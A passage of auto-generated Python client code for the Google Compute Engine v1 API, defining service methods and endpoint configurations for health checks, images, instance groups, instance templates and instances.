method_id=u'compute.httpsHealthChecks.patch',
ordered_params=[u'project', u'httpsHealthCheck'],
path_params=[u'httpsHealthCheck', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/httpsHealthChecks/{httpsHealthCheck}',
request_field=u'httpsHealthCheckResource',
request_type_name=u'ComputeHttpsHealthChecksPatchRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Update(self, request, global_params=None):
"""Updates a HttpsHealthCheck resource in the specified project using the data included in the request.
Args:
request: (ComputeHttpsHealthChecksUpdateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Update')
return self._RunMethod(
config, request, global_params=global_params)
Update.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'PUT',
method_id=u'compute.httpsHealthChecks.update',
ordered_params=[u'project', u'httpsHealthCheck'],
path_params=[u'httpsHealthCheck', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/httpsHealthChecks/{httpsHealthCheck}',
request_field=u'httpsHealthCheckResource',
request_type_name=u'ComputeHttpsHealthChecksUpdateRequest',
response_type_name=u'Operation',
supports_download=False,
)
class ImagesService(base_api.BaseApiService):
"""Service class for the images resource."""
_NAME = u'images'
def __init__(self, client):
super(ComputeV1.ImagesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified image.
Args:
request: (ComputeImagesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.images.delete',
ordered_params=[u'project', u'image'],
path_params=[u'image', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/images/{image}',
request_field='',
request_type_name=u'ComputeImagesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Deprecate(self, request, global_params=None):
"""Sets the deprecation status of an image.
If an empty request body is given, clears the deprecation status instead.
Args:
request: (ComputeImagesDeprecateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Deprecate')
return self._RunMethod(
config, request, global_params=global_params)
Deprecate.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.images.deprecate',
ordered_params=[u'project', u'image'],
path_params=[u'image', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/images/{image}/deprecate',
request_field=u'deprecationStatus',
request_type_name=u'ComputeImagesDeprecateRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified image. Get a list of available images by making a list() request.
Args:
request: (ComputeImagesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Image) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.images.get',
ordered_params=[u'project', u'image'],
path_params=[u'image', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/images/{image}',
request_field='',
request_type_name=u'ComputeImagesGetRequest',
response_type_name=u'Image',
supports_download=False,
)
def GetFromFamily(self, request, global_params=None):
"""Returns the latest image that is part of an image family and is not deprecated.
Args:
request: (ComputeImagesGetFromFamilyRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Image) The response message.
"""
config = self.GetMethodConfig('GetFromFamily')
return self._RunMethod(
config, request, global_params=global_params)
GetFromFamily.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.images.getFromFamily',
ordered_params=[u'project', u'family'],
path_params=[u'family', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/images/family/{family}',
request_field='',
request_type_name=u'ComputeImagesGetFromFamilyRequest',
response_type_name=u'Image',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates an image in the specified project using the data included in the request.
Args:
request: (ComputeImagesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.images.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'forceCreate'],
relative_path=u'projects/{project}/global/images',
request_field=u'image',
request_type_name=u'ComputeImagesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of private images available to the specified project. Private images are images you create that belong to your project. This method does not get any images that belong to other projects, including publicly-available images, like Debian 8. If you want to get a list of publicly-available images, use this method to make a request to the respective image project, such as debian-cloud or windows-cloud.
Args:
request: (ComputeImagesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(ImageList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.images.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/images',
request_field='',
request_type_name=u'ComputeImagesListRequest',
response_type_name=u'ImageList',
supports_download=False,
)
def SetLabels(self, request, global_params=None):
"""Sets the labels on an image. To learn more about labels, read the Labeling Resources documentation.
Args:
request: (ComputeImagesSetLabelsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetLabels')
return self._RunMethod(
config, request, global_params=global_params)
SetLabels.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.images.setLabels',
ordered_params=[u'project', u'resource'],
path_params=[u'project', u'resource'],
query_params=[],
relative_path=u'projects/{project}/global/images/{resource}/setLabels',
request_field=u'globalSetLabelsRequest',
request_type_name=u'ComputeImagesSetLabelsRequest',
response_type_name=u'Operation',
supports_download=False,
)
class InstanceGroupManagersService(base_api.BaseApiService):
"""Service class for the instanceGroupManagers resource."""
_NAME = u'instanceGroupManagers'
def __init__(self, client):
super(ComputeV1.InstanceGroupManagersService, self).__init__(client)
self._upload_configs = {
}
def AbandonInstances(self, request, global_params=None):
"""Schedules a group action to remove the specified instances from the managed instance group. Abandoning an instance does not delete the instance, but it does remove the instance from any target pools that are applied by the managed instance group. This method reduces the targetSize of the managed instance group by the number of instances that you abandon. This operation is marked as DONE when the action is scheduled even if the instances have not yet been removed from the group. You must separately verify the status of the abandoning action with the listmanagedinstances method.
If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.
You can specify a maximum of 1000 instances with this method per request.
Args:
request: (ComputeInstanceGroupManagersAbandonInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('AbandonInstances')
return self._RunMethod(
config, request, global_params=global_params)
AbandonInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroupManagers.abandonInstances',
ordered_params=[u'project', u'zone', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/abandonInstances',
request_field=u'instanceGroupManagersAbandonInstancesRequest',
request_type_name=u'ComputeInstanceGroupManagersAbandonInstancesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def AggregatedList(self, request, global_params=None):
"""Retrieves the list of managed instance groups and groups them by zone.
Args:
request: (ComputeInstanceGroupManagersAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceGroupManagerAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instanceGroupManagers.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/instanceGroupManagers',
request_field='',
request_type_name=u'ComputeInstanceGroupManagersAggregatedListRequest',
response_type_name=u'InstanceGroupManagerAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified managed instance group and all of the instances in that group. Note that the instance group must not belong to a backend service. Read Deleting an instance group for more information.
Args:
request: (ComputeInstanceGroupManagersDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.instanceGroupManagers.delete',
ordered_params=[u'project', u'zone', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}',
request_field='',
request_type_name=u'ComputeInstanceGroupManagersDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def DeleteInstances(self, request, global_params=None):
"""Schedules a group action to delete the specified instances in the managed instance group. The instances are also removed from any target pools of which they were a member. This method reduces the targetSize of the managed instance group by the number of instances that you delete. This operation is marked as DONE when the action is scheduled even if the instances are still being deleted. You must separately verify the status of the deleting action with the listmanagedinstances method.
If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.
You can specify a maximum of 1000 instances with this method per request.
Args:
request: (ComputeInstanceGroupManagersDeleteInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('DeleteInstances')
return self._RunMethod(
config, request, global_params=global_params)
DeleteInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroupManagers.deleteInstances',
ordered_params=[u'project', u'zone', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/deleteInstances',
request_field=u'instanceGroupManagersDeleteInstancesRequest',
request_type_name=u'ComputeInstanceGroupManagersDeleteInstancesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns all of the details about the specified managed instance group. Get a list of available managed instance groups by making a list() request.
Args:
request: (ComputeInstanceGroupManagersGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceGroupManager) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instanceGroupManagers.get',
ordered_params=[u'project', u'zone', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}',
request_field='',
request_type_name=u'ComputeInstanceGroupManagersGetRequest',
response_type_name=u'InstanceGroupManager',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates a managed instance group using the information that you specify in the request. After the group is created, it schedules an action to create instances in the group using the specified instance template. This operation is marked as DONE when the group is created even if the instances in the group have not yet been created. You must separately verify the status of the individual instances with the listmanagedinstances method.
A managed instance group can have up to 1000 VM instances per group. Please contact Cloud Support if you need an increase in this limit.
Args:
request: (ComputeInstanceGroupManagersInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroupManagers.insert',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers',
request_field=u'instanceGroupManager',
request_type_name=u'ComputeInstanceGroupManagersInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of managed instance groups that are contained within the specified project and zone.
Args:
request: (ComputeInstanceGroupManagersListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceGroupManagerList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instanceGroupManagers.list',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers',
request_field='',
request_type_name=u'ComputeInstanceGroupManagersListRequest',
response_type_name=u'InstanceGroupManagerList',
supports_download=False,
)
def ListManagedInstances(self, request, global_params=None):
"""Lists all of the instances in the managed instance group. Each instance in the list has a currentAction, which indicates the action that the managed instance group is performing on the instance. For example, if the group is still creating an instance, the currentAction is CREATING. If a previous action failed, the list displays the errors for that failed action.
Args:
request: (ComputeInstanceGroupManagersListManagedInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceGroupManagersListManagedInstancesResponse) The response message.
"""
config = self.GetMethodConfig('ListManagedInstances')
return self._RunMethod(
config, request, global_params=global_params)
ListManagedInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroupManagers.listManagedInstances',
ordered_params=[u'project', u'zone', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'order_by', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/listManagedInstances',
request_field='',
request_type_name=u'ComputeInstanceGroupManagersListManagedInstancesRequest',
response_type_name=u'InstanceGroupManagersListManagedInstancesResponse',
supports_download=False,
)
def RecreateInstances(self, request, global_params=None):
"""Schedules a group action to recreate the specified instances in the managed instance group. The instances are deleted and recreated using the current instance template for the managed instance group. This operation is marked as DONE when the action is scheduled even if the instances have not yet been recreated. You must separately verify the status of the recreating action with the listmanagedinstances method.
If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.
You can specify a maximum of 1000 instances with this method per request.
Args:
request: (ComputeInstanceGroupManagersRecreateInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('RecreateInstances')
return self._RunMethod(
config, request, global_params=global_params)
RecreateInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroupManagers.recreateInstances',
ordered_params=[u'project', u'zone', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/recreateInstances',
request_field=u'instanceGroupManagersRecreateInstancesRequest',
request_type_name=u'ComputeInstanceGroupManagersRecreateInstancesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Resize(self, request, global_params=None):
"""Resizes the managed instance group. If you increase the size, the group creates new instances using the current instance template. If you decrease the size, the group deletes instances. The resize operation is marked DONE when the resize actions are scheduled even if the group has not yet added or deleted any instances. You must separately verify the status of the creating or deleting actions with the listmanagedinstances method.
If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration has elapsed before the VM instance is removed or deleted.
Args:
request: (ComputeInstanceGroupManagersResizeRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Resize')
return self._RunMethod(
config, request, global_params=global_params)
Resize.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroupManagers.resize',
ordered_params=[u'project', u'zone', u'instanceGroupManager', u'size'],
path_params=[u'instanceGroupManager', u'project', u'zone'],
query_params=[u'size'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/resize',
request_field='',
request_type_name=u'ComputeInstanceGroupManagersResizeRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetInstanceTemplate(self, request, global_params=None):
"""Specifies the instance template to use when creating new instances in this group. The templates for existing instances in the group do not change unless you recreate them.
Args:
request: (ComputeInstanceGroupManagersSetInstanceTemplateRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetInstanceTemplate')
return self._RunMethod(
config, request, global_params=global_params)
SetInstanceTemplate.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroupManagers.setInstanceTemplate',
ordered_params=[u'project', u'zone', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/setInstanceTemplate',
request_field=u'instanceGroupManagersSetInstanceTemplateRequest',
request_type_name=u'ComputeInstanceGroupManagersSetInstanceTemplateRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetTargetPools(self, request, global_params=None):
"""Modifies the target pools to which all instances in this managed instance group are assigned. The target pools automatically apply to all of the instances in the managed instance group. This operation is marked DONE when you make the request even if the instances have not yet been added to their target pools. The change might take some time to apply to all of the instances in the group depending on the size of the group.
Args:
request: (ComputeInstanceGroupManagersSetTargetPoolsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetTargetPools')
return self._RunMethod(
config, request, global_params=global_params)
SetTargetPools.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroupManagers.setTargetPools',
ordered_params=[u'project', u'zone', u'instanceGroupManager'],
path_params=[u'instanceGroupManager', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instanceGroupManagers/{instanceGroupManager}/setTargetPools',
request_field=u'instanceGroupManagersSetTargetPoolsRequest',
request_type_name=u'ComputeInstanceGroupManagersSetTargetPoolsRequest',
response_type_name=u'Operation',
supports_download=False,
)
class InstanceGroupsService(base_api.BaseApiService):
"""Service class for the instanceGroups resource."""
_NAME = u'instanceGroups'
def __init__(self, client):
super(ComputeV1.InstanceGroupsService, self).__init__(client)
self._upload_configs = {
}
def AddInstances(self, request, global_params=None):
"""Adds a list of instances to the specified instance group. All of the instances in the instance group must be in the same network/subnetwork. Read Adding instances for more information.
Args:
request: (ComputeInstanceGroupsAddInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('AddInstances')
return self._RunMethod(
config, request, global_params=global_params)
AddInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroups.addInstances',
ordered_params=[u'project', u'zone', u'instanceGroup'],
path_params=[u'instanceGroup', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}/addInstances',
request_field=u'instanceGroupsAddInstancesRequest',
request_type_name=u'ComputeInstanceGroupsAddInstancesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def AggregatedList(self, request, global_params=None):
"""Retrieves the list of instance groups and sorts them by zone.
Args:
request: (ComputeInstanceGroupsAggregatedListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceGroupAggregatedList) The response message.
"""
config = self.GetMethodConfig('AggregatedList')
return self._RunMethod(
config, request, global_params=global_params)
AggregatedList.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instanceGroups.aggregatedList',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/aggregated/instanceGroups',
request_field='',
request_type_name=u'ComputeInstanceGroupsAggregatedListRequest',
response_type_name=u'InstanceGroupAggregatedList',
supports_download=False,
)
def Delete(self, request, global_params=None):
"""Deletes the specified instance group. The instances in the group are not deleted. Note that instance group must not belong to a backend service. Read Deleting an instance group for more information.
Args:
request: (ComputeInstanceGroupsDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.instanceGroups.delete',
ordered_params=[u'project', u'zone', u'instanceGroup'],
path_params=[u'instanceGroup', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}',
request_field='',
request_type_name=u'ComputeInstanceGroupsDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified instance group. Get a list of available instance groups by making a list() request.
Args:
request: (ComputeInstanceGroupsGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceGroup) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instanceGroups.get',
ordered_params=[u'project', u'zone', u'instanceGroup'],
path_params=[u'instanceGroup', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}',
request_field='',
request_type_name=u'ComputeInstanceGroupsGetRequest',
response_type_name=u'InstanceGroup',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates an instance group in the specified project using the parameters that are included in the request.
Args:
request: (ComputeInstanceGroupsInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroups.insert',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instanceGroups',
request_field=u'instanceGroup',
request_type_name=u'ComputeInstanceGroupsInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves the list of instance groups that are located in the specified project and zone.
Args:
request: (ComputeInstanceGroupsListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceGroupList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instanceGroups.list',
ordered_params=[u'project', u'zone'],
path_params=[u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroups',
request_field='',
request_type_name=u'ComputeInstanceGroupsListRequest',
response_type_name=u'InstanceGroupList',
supports_download=False,
)
def ListInstances(self, request, global_params=None):
"""Lists the instances in the specified instance group.
Args:
request: (ComputeInstanceGroupsListInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceGroupsListInstances) The response message.
"""
config = self.GetMethodConfig('ListInstances')
return self._RunMethod(
config, request, global_params=global_params)
ListInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroups.listInstances',
ordered_params=[u'project', u'zone', u'instanceGroup'],
path_params=[u'instanceGroup', u'project', u'zone'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}/listInstances',
request_field=u'instanceGroupsListInstancesRequest',
request_type_name=u'ComputeInstanceGroupsListInstancesRequest',
response_type_name=u'InstanceGroupsListInstances',
supports_download=False,
)
def RemoveInstances(self, request, global_params=None):
"""Removes one or more instances from the specified instance group, but does not delete those instances.
If the group is part of a backend service that has enabled connection draining, it can take up to 60 seconds after the connection draining duration before the VM instance is removed or deleted.
Args:
request: (ComputeInstanceGroupsRemoveInstancesRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('RemoveInstances')
return self._RunMethod(
config, request, global_params=global_params)
RemoveInstances.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroups.removeInstances',
ordered_params=[u'project', u'zone', u'instanceGroup'],
path_params=[u'instanceGroup', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}/removeInstances',
request_field=u'instanceGroupsRemoveInstancesRequest',
request_type_name=u'ComputeInstanceGroupsRemoveInstancesRequest',
response_type_name=u'Operation',
supports_download=False,
)
def SetNamedPorts(self, request, global_params=None):
"""Sets the named ports for the specified instance group.
Args:
request: (ComputeInstanceGroupsSetNamedPortsRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('SetNamedPorts')
return self._RunMethod(
config, request, global_params=global_params)
SetNamedPorts.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceGroups.setNamedPorts',
ordered_params=[u'project', u'zone', u'instanceGroup'],
path_params=[u'instanceGroup', u'project', u'zone'],
query_params=[],
relative_path=u'projects/{project}/zones/{zone}/instanceGroups/{instanceGroup}/setNamedPorts',
request_field=u'instanceGroupsSetNamedPortsRequest',
request_type_name=u'ComputeInstanceGroupsSetNamedPortsRequest',
response_type_name=u'Operation',
supports_download=False,
)
class InstanceTemplatesService(base_api.BaseApiService):
"""Service class for the instanceTemplates resource."""
_NAME = u'instanceTemplates'
def __init__(self, client):
super(ComputeV1.InstanceTemplatesService, self).__init__(client)
self._upload_configs = {
}
def Delete(self, request, global_params=None):
"""Deletes the specified instance template. If you delete an instance template that is being referenced from another instance group, the instance group will not be able to create or recreate virtual machine instances. Deleting an instance template is permanent and cannot be undone.
Args:
request: (ComputeInstanceTemplatesDeleteRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Delete')
return self._RunMethod(
config, request, global_params=global_params)
Delete.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'DELETE',
method_id=u'compute.instanceTemplates.delete',
ordered_params=[u'project', u'instanceTemplate'],
path_params=[u'instanceTemplate', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/instanceTemplates/{instanceTemplate}',
request_field='',
request_type_name=u'ComputeInstanceTemplatesDeleteRequest',
response_type_name=u'Operation',
supports_download=False,
)
def Get(self, request, global_params=None):
"""Returns the specified instance template. Get a list of available instance templates by making a list() request.
Args:
request: (ComputeInstanceTemplatesGetRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceTemplate) The response message.
"""
config = self.GetMethodConfig('Get')
return self._RunMethod(
config, request, global_params=global_params)
Get.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instanceTemplates.get',
ordered_params=[u'project', u'instanceTemplate'],
path_params=[u'instanceTemplate', u'project'],
query_params=[],
relative_path=u'projects/{project}/global/instanceTemplates/{instanceTemplate}',
request_field='',
request_type_name=u'ComputeInstanceTemplatesGetRequest',
response_type_name=u'InstanceTemplate',
supports_download=False,
)
def Insert(self, request, global_params=None):
"""Creates an instance template in the specified project using the data that is included in the request. If you are creating a new template to update an existing instance group, your new instance template must use the same network or, if applicable, the same subnetwork as the original template.
Args:
request: (ComputeInstanceTemplatesInsertRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('Insert')
return self._RunMethod(
config, request, global_params=global_params)
Insert.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instanceTemplates.insert',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[],
relative_path=u'projects/{project}/global/instanceTemplates',
request_field=u'instanceTemplate',
request_type_name=u'ComputeInstanceTemplatesInsertRequest',
response_type_name=u'Operation',
supports_download=False,
)
def List(self, request, global_params=None):
"""Retrieves a list of instance templates that are contained within the specified project and zone.
Args:
request: (ComputeInstanceTemplatesListRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(InstanceTemplateList) The response message.
"""
config = self.GetMethodConfig('List')
return self._RunMethod(
config, request, global_params=global_params)
List.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'GET',
method_id=u'compute.instanceTemplates.list',
ordered_params=[u'project'],
path_params=[u'project'],
query_params=[u'filter', u'maxResults', u'orderBy', u'pageToken'],
relative_path=u'projects/{project}/global/instanceTemplates',
request_field='',
request_type_name=u'ComputeInstanceTemplatesListRequest',
response_type_name=u'InstanceTemplateList',
supports_download=False,
)
class InstancesService(base_api.BaseApiService):
"""Service class for the instances resource."""
_NAME = u'instances'
def __init__(self, client):
super(ComputeV1.InstancesService, self).__init__(client)
self._upload_configs = {
}
def AddAccessConfig(self, request, global_params=None):
"""Adds an access config to an instance's network interface.
Args:
request: (ComputeInstancesAddAccessConfigRequest) input message
global_params: (StandardQueryParameters, default: None) global arguments
Returns:
(Operation) The response message.
"""
config = self.GetMethodConfig('AddAccessConfig')
return self._RunMethod(
config, request, global_params=global_params)
AddAccessConfig.method_config = lambda: base_api.ApiMethodInfo(
http_method=u'POST',
method_id=u'compute.instances.addAccessConfig',
ordered_params=[u'project', u'zone', u'instance', u'networkInterface'],
path_params=[u'instance', u'project', u'zone'],
query_params=[u'networkInterface'],
relative_path=u'projects/{project}/zones/{zone}/instances/{instance}/addAccessConfig',
